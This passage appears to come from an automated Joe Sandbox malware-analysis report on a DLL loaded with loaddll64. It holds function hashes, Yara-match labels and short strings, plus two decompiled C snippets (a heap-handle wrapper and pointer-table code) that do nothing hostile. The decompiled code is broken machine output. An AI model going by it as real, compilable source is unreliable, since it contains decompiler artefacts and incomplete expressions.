Instruction ID: 6d64e93883db61d95f36b7a5a375b7ada03e85890cb65b9286afd9a0e7997e4a
Opcode Fuzzy Hash: ae29b2ab0911a73132ecede333d1ad00ec6016c3b77c06c2e3197b8238caa4ac
Instruction Fuzzy Hash: 42317EB190438E8FDB48DF68D85A5AE3BA0FB48344F014A1DEC269B354D7B4D664CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007694 Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

3k^), xrefs: 00000001800076E9

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 3k^)
API String ID: 0-3788653604
Opcode ID: bb4a256fcbfa579ec56a1ee2ed7beb19ee26f98eb9724182ed08b84c2a93462e
Instruction ID: 9f8dcddef577f6809e8fc1cb2f7e992fa0b5e1cd21e70ff7818dd4bfba9124f9
Opcode Fuzzy Hash: bb4a256fcbfa579ec56a1ee2ed7beb19ee26f98eb9724182ed08b84c2a93462e
Instruction Fuzzy Hash: B7417FB090474E8BDB44CF64C48A5CE7FB0FB68398F200619F859A6250D3B8D6A5CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800078B6 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

L>, xrefs: 00000001800078C4

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: L>
API String ID: 0-3698593629
Opcode ID: 4505467bed29688f524a608710bc2007b6739dbdf074f8a934cd9a0936b0c64f
Instruction ID: d89d460aa873d83448a17f0a74045e6cf2e1d6238d53f49acea812bb04bd12ae
Opcode Fuzzy Hash: 4505467bed29688f524a608710bc2007b6739dbdf074f8a934cd9a0936b0c64f
Instruction Fuzzy Hash: C23193716183818BD748DF28D45652ABBE1FB8D30CF504B2DF8CAA7255D738D605CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018ECC Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

4s, xrefs: 0000000180018F49

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 4s
API String ID: 0-872399246
Opcode ID: 6d87eca2fd37755a10645a04d53ddd8ccaa51cb07cf26575bdb0066d7b11df8f
Instruction ID: eeb76c7ae662c84e9fd1594776157fcd1e0c77f05a4f9c485f3ea2b2cc7d31c8
Opcode Fuzzy Hash: 6d87eca2fd37755a10645a04d53ddd8ccaa51cb07cf26575bdb0066d7b11df8f
Instruction Fuzzy Hash: 314181B090474A8FDB48CF64D48A5DF7FB0FB68398F200519E859A62A0D378D6A4CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000BD00 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

&', xrefs: 000000018000BDEC

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: &'
API String ID: 0-655172784
Opcode ID: 350a21f38a3fdb5f3133185a05ab1b6e8489f4d150297426f8e9146ad85da26a
Instruction ID: e60b1eca4cd057e5464165fc71d6e00ca11e6494182570a2c7a3ee484fb5e5db
Opcode Fuzzy Hash: 350a21f38a3fdb5f3133185a05ab1b6e8489f4d150297426f8e9146ad85da26a
Instruction Fuzzy Hash: DE3179755083818BD348DF28C55641ABBE1BBCC35CF805B2DE4CAAB3A4D778D605CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005590 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

`, xrefs: 0000000180005640

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 1919c1110502d15319449504d6e91b7fa88324414ab81abcf7b1c29e64ecc28d
Instruction ID: 12f27fef96dc8894754dd231533b976fb372cf9f09be1d3cddb09b50d4677c93
Opcode Fuzzy Hash: 1919c1110502d15319449504d6e91b7fa88324414ab81abcf7b1c29e64ecc28d
Instruction Fuzzy Hash: 2221267065DB449FE388DF29C48961BBAE1FBD8340F905A1EF885C2360C734D845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001CCC Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

ZR, xrefs: 0000000180001DEC

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ZR
API String ID: 0-4130514108
Opcode ID: 6cbb8a842fd3cc15b819203d482a3a3b46369313eab12406f6265ee7f7ea0382
Instruction ID: b13af9977396cc860318babd94d7947ade869d3bdb5f1587fd609083ec60b6d4
Opcode Fuzzy Hash: 6cbb8a842fd3cc15b819203d482a3a3b46369313eab12406f6265ee7f7ea0382
Instruction Fuzzy Hash: 0B316EB052D780AFD388DF28C49691ABBE1FBC5315F806A1DF9968B350D774D445CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005478 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

%F, xrefs: 0000000180005566

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %F
API String ID: 0-915744445
Opcode ID: cf4e8b82da0d821891615694ed2d7715b09984878493b04af082e458cdddcb63
Instruction ID: f3632c01bd7492b9d648e83c8b8289f5be8476ad9f7b0aa526bfe9f17a615d29
Opcode Fuzzy Hash: cf4e8b82da0d821891615694ed2d7715b09984878493b04af082e458cdddcb63
Instruction Fuzzy Hash: A1317AB15087809BD348DF28D44A45ABBE1BB9C31CF414B1DF4CAAB254D3B9D608CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E708 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

>, xrefs: 000000018000E80A

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: >
API String ID: 0-1166260821
Opcode ID: 7fdb2c55224cd27c72bb618ee64ca03bed07baaed02b8a8707ebf8ca8fbe557d
Instruction ID: a3d582c264d7a48cbd0e974e941d71c0af5034fa157bb054186120ff964f1b5c
Opcode Fuzzy Hash: 7fdb2c55224cd27c72bb618ee64ca03bed07baaed02b8a8707ebf8ca8fbe557d
Instruction Fuzzy Hash: 4F316BB55083808FD788DF28D45941ABBE0BB9C358F404B2DF4CAA72A1D778DA45CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009D24 Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

-, xrefs: 0000000180009D48

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: -
API String ID: 0-524432557
Opcode ID: ab6574b7591fa644ef4a174e0089e3a7f2dde0b4bdacdeb17973816cbe5b2230
Instruction ID: 2743ae798d84361f3c47c0844efe4056bc1e573d44da25ce9fa5af028cbcbbd6
Opcode Fuzzy Hash: ab6574b7591fa644ef4a174e0089e3a7f2dde0b4bdacdeb17973816cbe5b2230
Instruction Fuzzy Hash: E22160B152D780AFD388DF29D18991BBBE0BB85344F806E1DF8C68B250D7B5D845CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018560 Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

9D, xrefs: 00000001800185F7

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 9D
API String ID: 0-1055660748
Opcode ID: 7e3a213964b2efcfd3778a88dd8b399f98e251b5205d52f3c39e35f889fd4133
Instruction ID: 2b980fabc4745c60efad4018d3cdf33bc582eba9e1b676cceb4e0857b73aa84d
Opcode Fuzzy Hash: 7e3a213964b2efcfd3778a88dd8b399f98e251b5205d52f3c39e35f889fd4133
Instruction Fuzzy Hash: 6C2179B450C3858BD348DF28D14A51ABBE0BB9C70CF400B5DF8CAAB254D778D644CB0A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180022A84 Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

]i, xrefs: 0000000180022A88

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ]i
API String ID: 0-2057496602
Opcode ID: 986d758f6ca8ef85e847a0378ae5df520f089d8d24386f824cd21791a7bd6731
Instruction ID: 4a116e0a0ac8943674a44645b40dd0a83197eee35043817acb7aa81aadce2f0a
Opcode Fuzzy Hash: 986d758f6ca8ef85e847a0378ae5df520f089d8d24386f824cd21791a7bd6731
Instruction Fuzzy Hash: 492154B45087858BD398DF28D48A50AFBE0BB9C318F400B1DF4C9A62A4D77DDA45CB0A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FDD90 Relevance: 1.3, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FFA7FFA094FDD90(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x956f930 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}

0x7ffa094fdd94
0x7ffa094fdd9d
0x7ffa094fddab

APIs

GetProcessHeap.KERNEL32 ref: 00007FFA094FDD94

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: d636a00b42bd7fb21fd81f09ca247f2baf2d4d4e689b7af4b01eea6171bd139b
Instruction ID: a2c44f7a16a50050ecfc9454cf6f865007fff204be93ff376ee520dd43decb88
Opcode Fuzzy Hash: d636a00b42bd7fb21fd81f09ca247f2baf2d4d4e689b7af4b01eea6171bd139b
Instruction Fuzzy Hash: 37B09220E17A02C2EA082F727CC221422A87F4EB00F888038CA0C41320DF3C30BE5700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015694 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 242dba147a3b42ea0af5cfec930ece5e83433d0fba20fb6d2f2fe3008541b1f6
Instruction ID: acc53311729b3702271ddd4d27c6e114e7717bdbebfd3a0864e34ca081a3005a
Opcode Fuzzy Hash: 242dba147a3b42ea0af5cfec930ece5e83433d0fba20fb6d2f2fe3008541b1f6
Instruction Fuzzy Hash: C691197090470CAFDB98DF68C04669DBBF2FB48344F40C1ADE849AB690D7759A19CB85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001B2F0 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ff37af258a23db5c01797c23f2434de8658ec910b62f667d3e0b084e4f6255
Instruction ID: ee1a5b038e23b1b762728b601e6c99c8254ef48870683394c78a05e9b81e4730
Opcode Fuzzy Hash: f4ff37af258a23db5c01797c23f2434de8658ec910b62f667d3e0b084e4f6255
Instruction Fuzzy Hash: 9A61457160460C8BDB6CDF38D4866A93BE5FB58740F24613DF866C72A2DB74D906CB44

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000741C Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 411371247076829a3ed050940fe1e65d63f7276580b25cd8f2de86b758f4f241
Instruction ID: 124210ae31362696c8e7c7fc55ee17b9d1fa189669067b7980e05abe0ce7dbb4
Opcode Fuzzy Hash: 411371247076829a3ed050940fe1e65d63f7276580b25cd8f2de86b758f4f241
Instruction Fuzzy Hash: 9C81CF7190471C8FEB65DFA8C48968DBFF0FB58388F20461EE815A7262DB749945CF81

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001629C Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dac85506b1f04058cb15554c85bbceb8ebb7a831f5bd702a5d02e9f92134646
Instruction ID: 378d96e7360db12acf5ccb9a2c1092155fc294dfe99add9db15bd0895a73080d
Opcode Fuzzy Hash: 9dac85506b1f04058cb15554c85bbceb8ebb7a831f5bd702a5d02e9f92134646
Instruction Fuzzy Hash: 74516C71524A8CABDBCDCE28D8C6A993BA0FB15344F90621DFC46C7292CB74D985CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FABC0 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a302809728b8e03c07a5101cfacb15d383c3ede7fbfee8270d7ccf682f85e519
Instruction ID: 83a54547dd3fc0785f13be1081e8e9a380fe0cbfef0e9fa32ee7ce1aa3019b69
Opcode Fuzzy Hash: a302809728b8e03c07a5101cfacb15d383c3ede7fbfee8270d7ccf682f85e519
Instruction Fuzzy Hash: 9A41E751F65BDA47EE039F7A64227B04A04AFA77C1E41E332ED0A77B51EB195456C200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FA370 Relevance: .1, Instructions: 126
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 60%

			E00007FFA7FFA094FA370(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
				void* _t24;
				int _t26;
				signed int _t51;
				void* _t52;
				signed long long _t66;
				signed int* _t73;
				signed long long _t75;
				signed long long _t77;
				signed long long _t78;
				signed long long _t95;
				signed long long _t96;
				signed long long _t98;
				signed long long _t104;
				long long _t115;
				void* _t117;
				void* _t120;
				signed long long* _t123;
				signed long long _t124;
				signed long long _t126;
				signed long long _t129;
				signed long long*** _t132;

				_t52 = __edi;
				_t51 = __edx;
				 *((long long*)(_t117 + 0x10)) = __rbx;
				 *((long long*)(_t117 + 0x18)) = _t115;
				 *((long long*)(_t117 + 0x20)) = __rsi;
				_t66 =  *((intOrPtr*)(__rcx));
				_t132 = __rcx;
				_t73 =  *_t66;
				if (_t73 == 0) goto 0x94fa504;
				_t124 =  *0x956e008; // 0x53c008c84601
				_t111 =  *_t73 ^ _t124;
				asm("dec eax");
				_t75 = _t73[4] ^ _t124;
				asm("dec ecx");
				asm("dec eax");
				if ((_t73[2] ^ _t124) != _t75) goto 0x94fa476;
				_t77 = _t75 - ( *_t73 ^ _t124) >> 3;
				_t101 =  >  ? _t66 : _t77;
				_t6 = _t115 + 0x20; // 0x20
				_t102 = ( >  ? _t66 : _t77) + _t77;
				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77;
				if (( ==  ? _t66 : ( >  ? _t66 : _t77) + _t77) - _t77 < 0) goto 0x94fa412;
				_t7 = _t115 + 8; // 0x8
				r8d = _t7;
				E00007FFA7FFA094FD858(_t6, r10d & 0x0000003f, __esp, _t77, _t111,  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77, _t111, _t115, _t120);
				_t24 = E00007FFA7FFA094FA9DC(_t66, _t111);
				if (_t66 != 0) goto 0x94fa43a;
				_t104 = _t77 + 4;
				r8d = 8;
				E00007FFA7FFA094FD858(_t24, 0, __esp, _t77, _t111, _t104, _t111, _t115, _t120);
				_t129 = _t66;
				_t26 = E00007FFA7FFA094FA9DC(_t66, _t111);
				if (_t129 == 0) goto 0x94fa504;
				_t123 = _t129 + _t77 * 8;
				_t78 = _t129 + _t104 * 8;
				_t88 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
				_t64 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
				if (( >  ? _t115 : _t78 - _t123 + 7 >> 3) == 0) goto 0x94fa476;
				memset(_t52, _t26, 0 << 0);
				_t126 =  *0x956e008; // 0x53c008c84601
				r8d = 0x40;
				_t14 =  &(_t123[1]); // 0x7ffa094f1024
				asm("dec eax");
				 *_t123 =  *(_t132[1]) ^ _t126;
				_t95 =  *0x956e008; // 0x53c008c84601
				asm("dec eax");
				 *( *( *_t132)) = _t129 ^ _t95;
				_t96 =  *0x956e008; // 0x53c008c84601
				asm("dec eax");
				( *( *_t132))[1] = _t14 ^ _t96;
				_t98 =  *0x956e008; // 0x53c008c84601
				r8d = r8d - (_t51 & 0x0000003f);
				asm("dec eax");
				( *( *_t132))[2] = _t78 ^ _t98;
				goto 0x94fa507;
				return 0xffffffff;
			}

0x7ffa094fa370
0x7ffa094fa370
0x7ffa094fa370
0x7ffa094fa375
0x7ffa094fa37a
0x7ffa094fa388
0x7ffa094fa38d
0x7ffa094fa390
0x7ffa094fa396
0x7ffa094fa39c
0x7ffa094fa3b4
0x7ffa094fa3ba
0x7ffa094fa3bd
0x7ffa094fa3c0
0x7ffa094fa3c3
0x7ffa094fa3c9
0x7ffa094fa3d7
0x7ffa094fa3e1
0x7ffa094fa3e5
0x7ffa094fa3e8
0x7ffa094fa3eb
0x7ffa094fa3f2
0x7ffa094fa3f4
0x7ffa094fa3f4
0x7ffa094fa3fe
0x7ffa094fa408
0x7ffa094fa410
0x7ffa094fa412
0x7ffa094fa416
0x7ffa094fa422
0x7ffa094fa429
0x7ffa094fa42c
0x7ffa094fa434
0x7ffa094fa441
0x7ffa094fa445
0x7ffa094fa45d
0x7ffa094fa461
0x7ffa094fa464
0x7ffa094fa46c
0x7ffa094fa46f
0x7ffa094fa476
0x7ffa094fa47c
0x7ffa094fa495
0x7ffa094fa49b
0x7ffa094fa49e
0x7ffa094fa4b1
0x7ffa094fa4ba
0x7ffa094fa4c0
0x7ffa094fa4d1
0x7ffa094fa4da
0x7ffa094fa4de
0x7ffa094fa4ea
0x7ffa094fa4f3
0x7ffa094fa4fe
0x7ffa094fa502
0x7ffa094fa51f

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: ErrorLastPrivilegeRelease
String ID:
API String ID: 1334314998-0
Opcode ID: ed3b70687e7945458bcaab2cb262aa06014580efde759abfe4f9ab75d549e353
Instruction ID: ea947e0d0c637fd3495d477613b91caf165fc0995839e34c4372c265950e8935
Opcode Fuzzy Hash: ed3b70687e7945458bcaab2cb262aa06014580efde759abfe4f9ab75d549e353
Instruction Fuzzy Hash: CC41E422714A5582EF14CF3AE92916963A1BB4DFD4B49D036DE4D87B58EF3DD056C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013698 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fd7e54c2e3c2eb2f4057fbf02f2f3a8737c251e610f5f48a5c25456a3c2a7c7
Instruction ID: 707c8c7feef62a70d2195b75d5e6b66e4219545dc678810288b7b2209aceacb9
Opcode Fuzzy Hash: 0fd7e54c2e3c2eb2f4057fbf02f2f3a8737c251e610f5f48a5c25456a3c2a7c7
Instruction Fuzzy Hash: 1161917154878DDBEBBACF24D88A7D97BB0FB48314F904219D84E8E290DB74574ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011DAC Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a779fa67324b10137dca71439002aac2bbc9acba917943a89a2440558f265d6
Instruction ID: 49561eaafaa20b5dbb512bdc2e8c8324cc323e320cbd5a294de7a2bbabfa02a5
Opcode Fuzzy Hash: 8a779fa67324b10137dca71439002aac2bbc9acba917943a89a2440558f265d6
Instruction Fuzzy Hash: 3351B07051478C8BEBBACF28DC9A7DB3BB1FB48704F50421DA84E8E2A0DB765645CB41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D1AC Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de15e4835354da21c21c581afa9e1e49ad56d5e721c00a56a2a0f9a367a7b1e2
Instruction ID: cab1e4afcb3e4e3efad056c987e19407a7ae96f8ba765043352ee3f473a28ce2
Opcode Fuzzy Hash: de15e4835354da21c21c581afa9e1e49ad56d5e721c00a56a2a0f9a367a7b1e2
Instruction Fuzzy Hash: 7A51597191474DCBDF6DCF68C88A6DDBBB0FF08344F004219E94662291DB799949CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180020930 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1891d7c6e5579f1ddf716b9efe699b55b9d074dc8e7dc217c6cd483ac21faf1f
Instruction ID: 0d5a1e45f689093ba705f26d6d0b7ee4761fe465e88e59cb2662693f670c6f5b
Opcode Fuzzy Hash: 1891d7c6e5579f1ddf716b9efe699b55b9d074dc8e7dc217c6cd483ac21faf1f
Instruction Fuzzy Hash: 99517CB590034A8FDB88CF64C58A4DF7FB0BB68398F204619F856962A0D374D6A5CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E570 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0947fb190b259f2f036e8e13266f38e419df21044a1d34d71fc6672665701d99
Instruction ID: 6b1a579500f7469a5a283cf0a7520b14203c8905753f3a8ac0622774f88945dd
Opcode Fuzzy Hash: 0947fb190b259f2f036e8e13266f38e419df21044a1d34d71fc6672665701d99
Instruction Fuzzy Hash: 1241D3B050034E8BDB48CF64D88A4DE7FF0FB68398F214619F859A6250D378D6A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013524 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95e6112c03750f4c0630cdb5a18b98eee8cc7382c4e8c9e1a176535c4f274712
Instruction ID: 4275e61531d4984f43622383f8721a212c43d9f9e5acc043d588a3e2cbca8aaf
Opcode Fuzzy Hash: 95e6112c03750f4c0630cdb5a18b98eee8cc7382c4e8c9e1a176535c4f274712
Instruction Fuzzy Hash: 0741D2B090074E8FDB48CF64C98A5DE7FB1FBA8394F204219EC4AA6250D374D6A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015508 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8348d3cd7f29255d4884c11fe93a9125b21d4f4a43616c69afa397f7f63962af
Instruction ID: afd4a856b60e5dc0eb8acee87462e8dc665325ca188dc724d3a88843a6c40c3d
Opcode Fuzzy Hash: 8348d3cd7f29255d4884c11fe93a9125b21d4f4a43616c69afa397f7f63962af
Instruction Fuzzy Hash: 6041AFB180438E8FDF48CF64C88A5DE7BB0FB58348F104A19E86696264D3B9D664CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180017198 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

